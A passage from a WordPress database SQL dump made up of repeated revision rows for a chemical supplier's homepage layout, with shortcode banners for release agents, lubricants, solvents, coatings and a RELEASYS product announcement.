parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n<br>\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 22:14:30', '2016-08-15 22:14:30', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (106, 1, '2016-08-15 22:15:42', '2016-08-15 22:15:42', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#140066" bg="#140066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%" text_align="right" text_pos="right top"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner text_width="60%" text_align="right" text_pos="bottom"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="270px" bg="29" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="120px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n<br>\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 22:15:42', '2016-08-15 22:15:42', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (107, 1, '2016-08-15 22:16:35', '2016-08-15 22:16:35', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#140066" bg="#140066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner text_width="60%" text_align="bottom" text_pos="bottom"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="270px" bg="29" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="120px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n<br>\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 22:16:35', '2016-08-15 22:16:35', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (108, 1, '2016-08-15 22:18:31', '2016-08-15 22:18:31', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#140066" bg="#140066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner bg="86" text_width="60%" text_align="right" text_pos="right bottom"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="270px" bg="29" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="120px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n<br>\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 22:18:31', '2016-08-15 22:18:31', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (109, 1, '2016-08-15 22:19:19', '2016-08-15 22:19:19', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#140066" bg="#140066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner bg="86" text_width="60%" text_align="right" text_pos="right top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="270px" bg="29" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="120px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n<br>\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 22:19:19', '2016-08-15 22:19:19', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (110, 1, '2016-08-15 22:20:18', '2016-08-15 22:20:18', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#140066" bg="#140066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner bg="86" text_width="60%" text_align="right" text_pos="full-width far-bottom"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="270px" bg="29" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="120px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n<br>\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 22:20:18', '2016-08-15 22:20:18', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (111, 1, '2016-08-15 22:20:43', '2016-08-15 22:20:43', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#140066" bg="#140066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner bg="86" height="150px" text_width="60%" text_align="right" text_pos="full-width far-bottom"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="270px" bg="29" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="120px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n<br>\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 22:20:43', '2016-08-15 22:20:43', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (112, 1, '2016-08-15 22:21:56', '2016-08-15 22:21:56', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#140066" bg="#140066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner bg="86" height="150px" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-bottom""]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-bottom"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER 